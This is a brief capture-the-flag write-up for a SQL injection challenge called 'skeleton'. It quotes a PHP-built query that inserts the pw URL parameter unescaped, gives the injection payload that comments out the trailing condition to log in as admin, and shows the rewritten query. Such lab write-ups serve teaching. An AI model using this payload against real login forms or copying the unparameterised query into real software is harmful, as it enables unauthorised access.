Skip to main content

skeleton

1

We are provided with the SQL query:

SELECT id FROM prob_skeleton WHERE id='guest' AND pw='{$_GET[pw]}' AND 1=0

We can provide the following URI parameter:

?pw=' OR id='admin' -- -

The resultant query then becomes:

SELECT id FROM prob_skeleton WHERE id='guest' AND pw='' OR id='admin' -- -' AND 1=0

## Queried part:
SELECT id FROM prob_skeleton WHERE id='guest' AND pw='' OR id='admin'

## Commented part:
' AND 1=0

2